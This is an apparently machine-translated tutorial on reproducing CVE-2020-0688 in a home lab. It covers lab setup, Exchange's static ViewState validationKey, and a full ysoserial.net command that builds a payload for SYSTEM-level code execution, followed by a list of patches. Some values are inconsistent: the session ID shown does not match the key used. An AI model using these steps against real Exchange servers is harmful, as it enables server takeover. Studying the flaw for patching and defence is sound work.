Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to reproduce vulnerabilities in remote code execution of Microsoft Exchange service. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have some understanding of the relevant knowledge after reading this article.

Environment building

Install Exchange Server 2013 using Windows Server 2008

First, set Server2008 to static IP in the virtual machine.

Select add role in Server Manager-check Domain Service

After the installation is complete, open dcpromo at start-> run

After clicking the next step twice, select the new domain in the new forest.

Enter a domain name format

Select win2008 and check dns

Set password

Complete the installation

Preparation in advance

Open ad users and computers, and select users to add domain users

Change the domain after creation

Enter the user you just added, and then restart the computer

Install other prerequisites after logging in using the user you just added

Administrator starts powershell

Import-Module ServerManager

Add-WindowsFeature RSAT-ADDS

Restart the computer after installation and open powershell with administrator privileges

Import-Module ServerManager

Add-WindowsFeature NET-Framework, ADLDS

Install .net 4.5

Install Microsoft Office 2010 Filter Pack 64-bit

Https://www.microsoft.com/en-us/download/confirmation.aspx?id=17062

Open exchange and select the decompression location

Start installing Exchang

There are a lot of problems in the installation process, which are solved one by one.

Start the formal installation

Installation completed

CVE-2020-0688 vulnerability recurrence

Vulnerability details

Specifically, the vulnerability is found in the Exchange Control Panel (ECP) component. The nature of this vulnerability is very simple. Unlike every software installation that generates a random key, all Microsoft Exchange Server have the same validationKey and decryptionKey in the installed web.config file. These keys are used to ensure the security of ViewState. ViewState is the server-side data stored on the client by ASP.NET Web applications in a serialized format. The client returns this data to the server through the _ _ VIEWSTATE request parameter.

Due to the use of static keys, authenticated attackers can trick the target server into deserializing maliciously created ViewState data. With the help of YSoSerial.net, attackers can execute arbitrary .net code on Exchange Control Panel web applications.

To exploit this vulnerability, we need to collect the ViewStateUserKey and _ _ VIEWSTATEGENERATOR values from the authenticated session. ViewStateUserKey can be obtained from ASP.NET 's _ SessionIDcookie, while ViewStateUserKey can be found in a hidden field. All of this can be easily found through the tools in the browser.

First, go to the 192.168.92.128/ecp page and log in. The account used does not require any high privileges

Next, open the Network option of the browser development tool and press F5 to resend the request. You can find _ _ VIEWSTATEGENERATOR in the source code of the page, whose value is B97B4E27

Then, open the Headers tab and locate ASP.NET_SessionId=40c8e078-dc79-4001-9a52-de175b38a028

Now you have all the information you need for the attack:

-- validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF

-- validationalg = SHA1

-- generator = B97B4E27

-- viewstateuserkey = c1187666-c0ae-4f61-95d4-d2f5348d4300

The next step is to use ysoserial.net to generate the paylaod of ViewState. Demonstrate remote code execution by creating the file C:\ TideSec.txt:

Ysoserial.exe-p ViewState-g TextFormattingRunProperties-c "cmd / c echo test > C:\ TideSec.txt"-- validationalg= "SHA1"-- validationkey= "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"-- generator= "B97B4E27"-viewstateuserkey= "c1187666-c0ae-4f61-95d4-d2f5348d4300"-- isdebug-- islegacy

Encode the output with URL and construct the following URL:

Https://192.168.92.128/ecp/default.aspx?VIEWSTATEGENERATOR=&VIEWSTATE=

The address submitted within the browser for access echoes a 500error, but it has actually been created successfully, and it can be seen that it was created by a process with SYSTEM privileges. This indicates that an attacker can remotely execute code as "SYSTEM", completely destroying the Exchange server.

Scope of influence and reinforcement

Affect the version

Affect all versions of Exchang Server:

Microsoft Exchange Server 2010 Service Pack 3

Microsoft Exchange Server 2013

Microsoft Exchange Server 2016

Microsoft Exchange Server 2019

Protective measures

Patch download

Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 KB4536989

Microsoft Exchange Server 2013 Cumulative Update 23 KB4536988

Microsoft Exchange Server 2016 Cumulative Update 14 KB4536987

Microsoft Exchange Server 2016 Cumulative Update 15 KB4536987

Microsoft Exchange Server 2019 Cumulative Update 3 KB4536987

Microsoft Exchange Server 2019 Cumulative Update 4 KB4536987

On how to reproduce the loopholes in the remote code execution of Microsoft Exchange service, so far. I hope the above content can be of some help to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.